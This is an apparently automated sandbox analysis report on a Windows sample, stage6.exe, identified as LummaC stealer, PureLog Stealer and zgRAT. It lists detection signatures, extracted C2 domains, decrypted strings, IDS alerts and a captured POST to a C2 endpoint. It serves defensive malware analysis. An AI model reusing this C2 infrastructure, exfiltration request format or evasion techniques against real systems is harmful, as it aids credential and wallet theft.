Edit tour

Windows Analysis Report
stage6.exe

Overview

General Information

Sample name:stage6.exe
Analysis ID:1675329
MD5:03be1ee0944764446cd61be6ae8cc497
SHA1:a8007574c5a81af39d193b19a29cc2fde8305f26
SHA256:ca00dbff57cdc83f39a213ea96726063f18aa14f9a0ae2f52c2c6d54f23dcd00
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • stage6.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\stage6.exe" MD5: 03BE1EE0944764446CD61BE6AE8CC497)
    • stage6.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\stage6.exe" MD5: 03BE1EE0944764446CD61BE6AE8CC497)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{
  "C2 url": [
    "crosshuaht.lat",
    "rapeflowwj.lat",
    "aspecteirs.lat",
    "surmisehotte.click",
    "discokeyus.lat",
    "energyaffai.lat",
    "sustainskelet.lat",
    "necklacebudi.lat",
    "grannyejh.lat"
  ],
  "Build id": "yJEcaG--singl6"
}
SourceRuleDescriptionAuthorStrings
stage6.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    stage6.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Process Memory Space: stage6.exe PID: 6272JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Process Memory Space: stage6.exe PID: 6272JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  Click to see the 1 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.stage6.exe.5e20000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.0.stage6.exe.e80000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      0.0.stage6.exe.e80000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:12.042328+020020283713Unknown Traffic192.168.2.449713104.21.32.1443TCP
                        2025-04-27T05:33:33.426687+020020283713Unknown Traffic192.168.2.44972223.52.218.12443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:31.658514+020020546531A Network Trojan was detected192.168.2.449713104.21.32.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:31.658514+020020498361A Network Trojan was detected192.168.2.449713104.21.32.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:32.325443+020020583541Domain Observed Used for C2 Detected192.168.2.4570421.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:32.653417+020020583581Domain Observed Used for C2 Detected192.168.2.4553681.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:31.839059+020020583601Domain Observed Used for C2 Detected192.168.2.4538171.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:32.159469+020020583621Domain Observed Used for C2 Detected192.168.2.4605671.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:31.666749+020020583641Domain Observed Used for C2 Detected192.168.2.4621281.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:31.997019+020020583701Domain Observed Used for C2 Detected192.168.2.4632671.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:32.822532+020020583741Domain Observed Used for C2 Detected192.168.2.4588471.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:32.490041+020020583761Domain Observed Used for C2 Detected192.168.2.4642271.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-27T05:33:33.824801+020028586661Domain Observed Used for C2 Detected192.168.2.44972223.52.218.12443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: stage6.exeAvira: detected
                        Source: crosshuaht.latAvira URL Cloud: Label: malware
                        Source: https://rapeflowwj.lat/Avira URL Cloud: Label: malware
                        Source: energyaffai.latAvira URL Cloud: Label: malware
                        Source: sustainskelet.latAvira URL Cloud: Label: malware
                        Source: necklacebudi.latAvira URL Cloud: Label: malware
                        Source: rapeflowwj.latAvira URL Cloud: Label: malware
                        Source: https://necklacebudi.lat/apiAvira URL Cloud: Label: malware
                        Source: aspecteirs.latAvira URL Cloud: Label: malware
                        Source: grannyejh.latAvira URL Cloud: Label: malware
                        Source: discokeyus.latAvira URL Cloud: Label: malware
                        Source: 1.2.stage6.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "rapeflowwj.lat", "aspecteirs.lat", "surmisehotte.click", "discokeyus.lat", "energyaffai.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat"], "Build id": "yJEcaG--singl6"}
                        Source: stage6.exeVirustotal: Detection: 59%Perma Link
                        Source: stage6.exeReversingLabs: Detection: 63%
                        Source: Submited SampleNeural Call Log Analysis: 95.3%
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: surmisehotte.click
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                        Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yJEcaG--singl6
                        Source: stage6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.4:49722 version: TLS 1.2
                        Source: stage6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]1_2_0043C767
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]1_2_0040B70C
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then jmp eax1_2_0042984F
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]1_2_00423860
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov edx, ecx1_2_00438810
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh1_2_00438810
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh1_2_00438810
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then test eax, eax1_2_00438810
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041682D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]1_2_0041682D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]1_2_0041682D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ecx], bp1_2_0041D83A
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then push C0BFD6CCh1_2_00423086
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then push C0BFD6CCh1_2_00423086
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_0042B170
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]1_2_004179C1
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h1_2_0043B1D0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, eax1_2_0043B1D0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, eax1_2_00405990
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebp, eax1_2_00405990
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, esi1_2_00422190
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_00422190
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_00422190
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042CA49
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0042DA53
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]1_2_00416263
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]1_2_00415220
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then push esi1_2_00427AD3
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042CAD0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ebx], ax1_2_0041B2E0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then push ebx1_2_0043CA93
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041CB40
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [esi], cx1_2_0041CB40
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00428B61
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042CB11
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042CB22
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]1_2_0043F330
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, eax1_2_0040DBD9
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, eax1_2_0040DBD9
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]1_2_00417380
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h1_2_0041D380
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp al, 2Eh1_2_00426B95
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00435450
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]1_2_00417380
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then push 00000000h1_2_00429C2B
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_004074F0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_004074F0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]1_2_0043ECA0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h1_2_004385E0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then jmp eax1_2_004385E0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]1_2_00417DEE
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, eax1_2_00409580
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [ebp+00h], ax1_2_00409580
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then jmp dword ptr [0044450Ch]1_2_00418591
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]1_2_00428D93
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then xor edi, edi1_2_0041759F
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]1_2_0041C653
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov edx, ebp1_2_00425E70
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then jmp dword ptr [004455F4h]1_2_00425E30
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, eax1_2_0043AEC0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al1_2_00408F50
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [edi], bl1_2_00408F50
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042A700
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0041BF14
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]1_2_00419F30
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]1_2_0041E7C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx eax, word ptr [edx]1_2_004197C2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [edi], dx1_2_004197C2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov word ptr [esi], cx1_2_004197C2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, ebx1_2_0042DFE9
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then jmp ecx1_2_0040BFFD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov esi, eax1_2_00415799
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then mov ecx, eax1_2_00415799
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]1_2_0043EFB0

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:57042 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.4:64227 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.4:55368 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:62128 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:53817 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.4:63267 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.4:60567 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.4:58847 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49722 -> 23.52.218.12:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49713 -> 104.21.32.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49713 -> 104.21.32.1:443
                        Source: Malware configuration extractorURLs: crosshuaht.lat
                        Source: Malware configuration extractorURLs: rapeflowwj.lat
                        Source: Malware configuration extractorURLs: aspecteirs.lat
                        Source: Malware configuration extractorURLs: surmisehotte.click
                        Source: Malware configuration extractorURLs: discokeyus.lat
                        Source: Malware configuration extractorURLs: energyaffai.lat
                        Source: Malware configuration extractorURLs: sustainskelet.lat
                        Source: Malware configuration extractorURLs: necklacebudi.lat
                        Source: Malware configuration extractorURLs: grannyejh.lat
                        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                        Source: Joe Sandbox ViewIP Address: 23.52.218.12 23.52.218.12
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49713 -> 104.21.32.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 23.52.218.12:443
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: surmisehotte.click
                        Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                        Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                        Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                        Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                        Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                        Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                        Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                        Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
                        Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwA
                        Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                        Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz
                        Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat/api
                        Source: stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
